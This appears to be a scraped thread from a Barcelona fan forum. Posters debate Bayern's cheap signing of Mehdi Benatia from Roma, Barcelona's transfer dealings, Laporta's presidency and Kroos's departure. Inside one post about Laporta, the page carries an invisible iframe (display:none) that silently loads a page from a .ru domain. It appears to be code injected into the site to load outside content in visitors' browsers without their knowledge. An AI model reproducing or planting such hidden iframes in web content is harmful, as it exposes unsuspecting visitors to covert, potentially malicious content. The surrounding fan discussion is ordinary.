Mehdi Benatia

te amo barca

Blaugrana al vent
Bayern are still going to struggle because of their slow distribution and high line, they have got the best players in the world, but Pep can't make them look comfortable in his system apart from Lahm and Thiago.

JamDav1982

Come on everyone, I know exactly how you feel, but let's be sensible:

Are you having a meltdown because (1) we did not sign Benatia (and someone else did)? If so, why weren't you this upset as late as yesterday? Everyone knew we weren't going after him.

Or are you having a meltdown because (2) the extremely low price Bayern paid to get him? If so, it is not our money to spend, why should you be upset?

Bayern knows their business and drives a hard bargain. Our board truly is no match in this regard. Other than that, what is there to be so upset about? Yeah we spent 35m on two CBs who is either old or injured-prone. But let's give them the opportunity to demonstrate their value before we give out our verdict. All is not lost for us!

Personally, Bayern is one of the clubs that I dislike the most, and I am not happy that they are strengthened. But one world-class CB alone does not win games for them.

Bayern knows their business and drives a hard bargain. Our board truly is no match in this regard

Dont agree with this at all.

Bayern this late in the summer are in a position to drive a hard bargain with Roma, Barcelona wanted their business done before the season started.

Barcelona drive a hard bargain all the time and the majority of players come to Barca for cheaper than could go to other clubs.

Bertus

Come on everyone, I know exactly how you feel, but let's be sensible:

Are you having a meltdown because (1) we did not sign Benatia (and someone else did)? If so, why weren't you this upset as late as yesterday? Everyone knew we weren't going after him.

Or are you having a meltdown because (2) the extremely low price Bayern paid to get him? If so, it is not our money to spend, why should you be upset?

Bayern knows their business and drives a hard bargain. Our board truly is no match in this regard. Other than that, what is there to be so upset about? Yeah we spent 35m on two CBs who is either old or injured-prone. But let's give them the opportunity to demonstrate their value before we give out our verdict. All is not lost for us!

Personally, Bayern is one of the clubs that I dislike the most, so I am not happy that they are strengthened. But one world-class CB alone does not win games for them.

I don't have a meltdown, but I feel a bit cheated because to this day I thought neither PSG or Barcelona was on him because he had insane pricetag, but I was wrong.

I'm sad because he's great, and contrary to many people here I saw him playing and like many fans, I would have liked him to sign in a club I support.

The only consolation prize to me is that I am happy for him, because he deserves a top club, and Bayern is one.

Bertus

Bayern are still going to struggle because of their slow distribution and high line, they have got the best players in the world, but Pep can't make them look comfortable in his system apart from Lahm and Thiago.

Since when did they sign Messi, CR7 and Suarez? :)

Sid90

Who is Laporte? LaportA had his share of wrongdoings, but at the very least he had competent people around him... who build the best Barça ever, that was destroyed by the current board. Since the CL in 2011, Barça won only one big title, the lliga in 11-12.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Laporta had a lot of shady dealing going on and our financial situation was so dire as we had a debt of 500 -600 million euros during all those years of few wrong doings, that would have dissolved Barca as an entity which would have led to some random oil sheikh to buy the shares and take over the club from the socios(worst case scenario). So please don't talk about trophies considering the sh*t that Laporta put us through due to "few wrongdoings".

L

linetty

Listen, no one asks you to read this thread.

You want us to shut up because it annoys you that we think Barca missed a good opportunity to arguably sign a very good CB?

You know you can do like me and even use the Blacklist function of this forum. I put JamDav on it and can't read his sh*t anymore since when talking to me, he always does fallacies and talk about PSG instead of challenging my points. Now he can do offtopics alone.

It's better for the health trust me. Put all the names you dislike on your blacklist. Even I if you hate me, I could understand.

To my defense, I follow Benatia, and yeah I am sad. Double sad even because either PSG or Barcelona, they both snubbed him. I don't understand.
I'd have to put majority of the forum on the blacklist then.

Defence is not about big names and Simeone has shown that. Benatia would not have solved our defensive problems, proper tactical plan on the other hand most definitely would.

Pique, Bartra and Mathieu are great defenders and with support of fullbacks and midfield they can be a solid defensive wall like Atleti.

Last games against Elche showed some good signs, although it was only Elche they had no shot on goal and have not created a single opportunity besides that misplaced Busquets header.

Behrox

Vice President of FC Barcelona
I don't have a meltdown, but I feel a bit cheated because to this day I thought neither PSG or Barcelona was on him because he had insane pricetag, but I was wrong.

I'm sad because he's great, and contrary to many people here I saw him playing and like many fans, I would have liked him to sign in a club I support.

The only consolation prize to me is that I am happy for him, because he deserves a top club, and Bayern is one.

For all we know he might have had a high price tag when 4-5 clubs were supposedly going for him but the insane asking price from Roma drove the interest down and clubs went for other targets and Roma found themselves with too many CBs (they already bought Manolas as a replacement IIRC) and with only Bayern looking for CBs now due to Javi, Roma had no choice but to cave in

Bertus

40 ist more than 50?

I read he cost more if you include what City paid to all parties. He was not owned only by Porto. Maybe I'm wrong tho. I only followed it on french news, but here, it was posted that his transfer fee is above the one of DL, making it the highest fee for a CB.

Blame french medias if it's wrong. yet usually they know what they are talking about when it's about french players.

R

Ryu Hayabusa

Making your best midfielder feel unloved is poor management.

What? In how far was Kroos Bayern's "best midfielder"??
Thiago is already better (if in form and healthy, although that is a big IF), Robben and Ribery (in form) are both better if put in relation given the different positions. Lahm and Schweinsteiger as defensive orchestrators of the MF are also at least not worse.
Kroos was often pretty unreliable in his consistency. Jekyll and Hyde, Jekyll and Hyde...

JamDav1982

In what world is that true?

Halliovic, Ter Stegen, Suarez, Vermaelen this summer all came to Barca cheaper than could have gone elsewhere.

Others like Cesc, Neymar, Sanchez all upset their clubs when lefty as could have got more from other teams.

Thats what world Barca drive a hard bargain in.

Home of Barca Fans